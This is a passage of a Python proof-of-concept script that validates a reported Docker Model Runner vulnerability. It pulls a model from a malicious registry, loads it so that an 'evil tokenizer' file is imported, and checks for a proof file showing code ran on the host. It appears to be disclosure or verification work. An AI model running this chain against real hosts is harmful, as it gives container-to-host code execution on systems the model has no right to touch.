    if status is None or status != 200:
        print(f"  {YELLOW}SKIP{RESET}: registry not running at {REGISTRY_HOST}:{REGISTRY_PORT}")
        return

    rc, stdout, stderr = docker_run([
        "-s", "-o", "/dev/null", "-w", "%{http_code}",
        f"{MODEL_RUNNER_URL}/api/tags"
    ], timeout=15)
    mr_status = stdout.strip()
    if mr_status != "200":
        print(f"  {YELLOW}SKIP{RESET}: Model Runner not reachable (HTTP {mr_status})")
        print(f"         Make sure Docker Desktop Model Runner is enabled.")

        try:
            # text=True so stderr prints as text rather than a bytes repr.
            r = subprocess.run(["docker", "model", "list"], capture_output=True,
                               text=True, timeout=10)
            if r.returncode != 0:
                print(f"         'docker model list' failed: {r.stderr[:200]}")
                print(f"         Your Docker Desktop may not support Model Runner.")
        except FileNotFoundError:
            print(f"         'docker model' command not found.")
        return

    print(f"\n  Checking available Python backend...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf {MODEL_RUNNER_URL}/engines 2>&1 || echo ENGINES_FAIL'
    ], timeout=15)
    print(f"    Available engines: {stdout[:200]}")

    # Start from a clean slate so an old proof cannot satisfy step 3.
    for f in [PROOF_FILE, f"{PROOF_FILE}.flag"]:
        try:
            os.remove(f)
        except FileNotFoundError:
            pass

    print(f"\n  Step 1: pulling model from malicious registry...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf -X POST {MODEL_RUNNER_URL}/api/pull '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
    ], timeout=90)
    print(f"    Response: {stdout[:300]}")

    # curl -sf fails without printing anything, so a non-zero exit must count
    # as a failed pull even when the (empty) output contains no "error".
    if rc != 0:
        log_result("CHAIN-1", "Pull from malicious registry", False,
                   f"Pull failed (exit code {rc}): {stdout[:300] or stderr[:300]}")
        return

    log_result("CHAIN-1", "Model pulled from malicious registry",
               "error" not in stdout.lower(),
               f"Response: {stdout[:200]}",
               proves="Model Runner accepted the malicious model from the attacker registry.")

    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/requests")
    if status == 200:
        # Purely informational; a malformed log must not abort the chain.
        try:
            reqs = json.loads(body)
            blob_reqs = [r for r in reqs if "/blobs/" in r["path"]]
            manifest_reqs = [r for r in reqs if "/manifests/" in r["path"]]
        except (ValueError, KeyError, TypeError):
            print("    Registry request log could not be parsed")
        else:
            print(f"    Registry saw: {len(manifest_reqs)} manifest + {len(blob_reqs)} blob requests")

    print(f"\n  Step 2: triggering inference (this loads the model + evil tokenizer)...")
    print(f"    Might take 30-120s if the Python backend has to start...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf --max-time 120 -X POST '
        f'{MODEL_RUNNER_URL}/engines/v1/chat/completions '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"model": "{PULL_MODEL_NAME}", '
        f'"messages": [{{"role": "user", "content": "hello"}}]}}\' 2>&1'
    ], timeout=150)
    print(f"    Response: {stdout[:300]}")

    # Inference may fail (model is too small, OOM, etc.) but the tokenizer
    # import happens at LOAD time, before inference starts. Check the proof.
    log_result("CHAIN-2", "Inference request sent (import happens during model load)",
               rc != -1,
               f"Response: {stdout[:200]}\n"
               "NOTE: inference failure is expected with this tiny model. The import-time "
               "code execution happens before inference runs.",
               proves="Model loading was triggered. evil_tokenizer.py gets imported "
                      "during AutoTokenizer.from_pretrained().")

    print(f"\n  Step 3: checking for RCE proof on host...")
    # The backend might still be coming up
    for attempt in range(6):
        if Path(PROOF_FILE).exists() or Path(f"{PROOF_FILE}.flag").exists():
            break
        if attempt < 5:
            time.sleep(2)

    proof_path = Path(PROOF_FILE)
    if proof_path.exists():
        content = proof_path.read_text()
        try:
            proof = json.loads(content)
        except json.JSONDecodeError:
            proof = None

        if isinstance(proof, dict):
            log_result("CHAIN-3", "RCE CONFIRMED, arbitrary code executed on host",
                       proof.get("rce") is True,
                       json.dumps(proof, indent=2),
                       proves="A container with no special privileges got arbitrary "
                              "code execution on the Docker host via two HTTP requests.")
        else:
            # Not a JSON object: the file's existence is still evidence.
            log_result("CHAIN-3", "RCE CONFIRMED, proof file written on host",
                       len(content) > 0,
                       f"Content: {content[:500]}",
                       proves="Code executed on the host and wrote to the host filesystem.")
    elif Path(f"{PROOF_FILE}.flag").exists():
        log_result("CHAIN-3", "RCE CONFIRMED, flag file written on host", True,
                   f"Flag: {Path(f'{PROOF_FILE}.flag').read_text()}",
                   proves="Code executed on the host.")
    else:
        log_result("CHAIN-3", "RCE proof file not found on host", False,
                   f"Expected at: {PROOF_FILE}\n"
                   "Possible reasons:\n"
                   "  1. No Python backend (vllm-metal/vllm/mlx/sglang) installed\n"
                   "  2. Model loading failed before the tokenizer import\n"
                   "  3. Selected backend was llama.cpp (C++, doesn't import .py)\n"
                   "  4. Proof file path is different on this system")


# Summary
def _print_claim_rows(heading, rows):
    """Print one section of the claims matrix: a heading, then one row per result.

    Each row shows the claim id, a PROVEN/DISPROVEN/UNTESTED label derived
    from ``passed`` (True/False/None), and the description. For proven claims
    the first 100 characters of the ``proves`` text are printed underneath.
    """
    labels = {True: f"{GREEN}PROVEN{RESET}", False: f"{RED}DISPROVEN{RESET}",
              None: f"{YELLOW}UNTESTED{RESET}"}
    print(f"\n{BOLD}{heading}{RESET}")
    for r in rows:
        print(f"  {r['id']:12s} [{labels[r['passed']]}] {r['desc']}")
        if r.get("proves") and r["passed"] is True:
            print(f"               -> {r['proves'][:100]}")


def print_summary():
    """Print the claims matrix, totals and verdicts for everything in ``results``.

    Results are split into runtime and static groups by claim-id prefix
    (ids starting with "CHAIN", "2", "5d" or "6" are runtime; the rest are
    static). A group's verdict is only reported as validated when at least
    one of its tests produced a real pass/fail outcome; a group whose tests
    were all skipped (or never ran) is reported as "not tested" rather than
    vacuously "validated".

    When ``--json`` is present in ``sys.argv`` a JSON document with the raw
    results and a summary is printed as well; ``static_validated`` and
    ``runtime_validated`` are ``null`` there for untested groups.

    Returns:
        True if no result has ``passed`` set to False, otherwise False.
    """
    rule = "=" * 72
    print(f"\n{rule}")
    print(f"{BOLD}CLAIMS MATRIX{RESET}")
    print(rule)

    runtime_prefixes = ("CHAIN", "2", "5d", "6")
    static_tests = [r for r in results if not r["id"].startswith(runtime_prefixes)]
    runtime_tests = [r for r in results if r["id"].startswith(runtime_prefixes)]

    _print_claim_rows("Static analysis (from source code):", static_tests)
    _print_claim_rows("Runtime (live exploitation):", runtime_tests)

    passed = sum(1 for r in results if r["passed"] is True)
    failed = sum(1 for r in results if r["passed"] is False)
    skipped = sum(1 for r in results if r["passed"] is None)

    print(f"\n{rule}")
    print(f"{BOLD}TOTALS{RESET}")
    print(f"  {GREEN}Proven: {passed}{RESET}  |  "
          f"{RED}Disproven: {failed}{RESET}  |  "
          f"{YELLOW}Untested: {skipped}{RESET}  |  "
          f"Total: {len(results)}")

    # all() over an empty selection is True, so each "passed" flag is only
    # meaningful together with the matching "any tested" flag.
    static_passed = all(r["passed"] is True for r in static_tests if r["passed"] is not None)
    runtime_passed = all(r["passed"] is True for r in runtime_tests if r["passed"] is not None)
    any_static_tested = any(r["passed"] is not None for r in static_tests)
    any_runtime_tested = any(r["passed"] is not None for r in runtime_tests)

    print()
    if not any_static_tested:
        # e.g. --runtime-only, or every static test was skipped: claim nothing.
        print(f"  {YELLOW}Source: not tested{RESET}")
        print("    Static tests were skipped or produced no verdicts.")
    elif static_passed:
        print(f"  {GREEN}Source: all claims validated{RESET}")
        print("    Bug exists in the codebase as described.")
    else:
        print(f"  {RED}Source: some claims failed{RESET}")
        for r in static_tests:
            if r["passed"] is False:
                print(f"    FAILED: {r['id']}: {r['desc']}")

    if any_runtime_tested:
        if runtime_passed:
            print(f"  {GREEN}Runtime: all claims validated{RESET}")
            print("    Attack chain works end-to-end.")
        else:
            runtime_fails = [r for r in runtime_tests if r["passed"] is False]
            runtime_ok = [r for r in runtime_tests if r["passed"] is True]
            if runtime_fails:
                print(f"  {RED}Runtime: some claims failed{RESET}")
                for r in runtime_fails:
                    print(f"    FAILED: {r['id']}: {r['desc']}")
            if runtime_ok:
                print(f"  {GREEN}Runtime: {len(runtime_ok)} claims validated{RESET}")
    else:
        print(f"  {YELLOW}Runtime: not tested{RESET}")
        print("    Needs: Docker Desktop with Model Runner + a Python backend")

    if "--json" in sys.argv:
        print("\n--- JSON ---")
        print(json.dumps({
            "results": results,
            "summary": {
                "passed": passed, "failed": failed, "skipped": skipped,
                "static_validated": static_passed if any_static_tested else None,
                "runtime_validated": runtime_passed if any_runtime_tested else None,
            }
        }, indent=2))

    return failed == 0


def main():
    """Run the selected claim tests, print the summary and exit.

    Exits with status 2 when ``REPO_ROOT`` has no ``pkg`` entry. Otherwise
    runs the static tests (unless ``--runtime-only`` is given) and the
    runtime tests (unless ``--static-only`` is given), then exits with 0 if
    ``print_summary()`` reports success and 1 if it does not.
    """
    pkg_dir = REPO_ROOT / "pkg"
    if not pkg_dir.exists():
        print(f"ERROR: REPO_ROOT={REPO_ROOT} doesn't contain pkg/")
        print("Set REPO_ROOT env var to the model-runner repo root.")
        sys.exit(2)

    bar = "=" * 72
    print(f"{BOLD}{bar}")
    print("Docker Model Runner vulnerability claim validation")
    print(f"{bar}{RESET}")

    # Labels are left-aligned to the widest one so the values line up.
    settings = (
        ("Repo:", REPO_ROOT),
        ("Registry:", f"{REGISTRY_HOST}:{REGISTRY_PORT}"),
        ("Pull as:", PULL_MODEL_NAME),
        ("Proof:", PROOF_FILE),
    )
    for label, value in settings:
        print(f"  {label:<9} {value}")

    run_static = "--runtime-only" not in sys.argv
    run_runtime = "--static-only" not in sys.argv

    if run_static:
        for static_test in (test_claim_1, test_claim_3, test_claim_4,
                            test_claim_5, test_claim_7, test_edge_cases):
            static_test()

    if run_runtime:
        for runtime_test in (test_claim_2, test_claim_6, test_full_chain):
            runtime_test()

    exit_code = 0 if print_summary() else 1
    sys.exit(exit_code)


# Script entry point: run the validation only when this file is executed
# directly, not when it is imported as a module.
if __name__ == "__main__":
    main()